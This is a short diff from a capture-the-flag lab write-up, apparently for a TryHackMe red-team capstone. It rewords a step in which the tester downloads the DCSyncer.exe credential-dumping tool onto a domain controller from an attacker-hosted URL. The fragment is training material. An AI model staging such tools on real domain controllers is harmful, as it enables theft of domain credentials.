zinzloun/THM_WriteUP/RTM_Capstone/README.md

 	PolicyStoreSource     : PersistentStore
 	PolicyStoreSourceType : Local

-Now from the bankdc host we can proceed to download the DCSyncer exe from the attacker machine visiting the following URL:
+Now from the bankdc host we can proceed to download the DCSyncer.exe from the attacker machine, visiting the following URL:

  	http://10.200.89.100:8000/DCSyncer.exe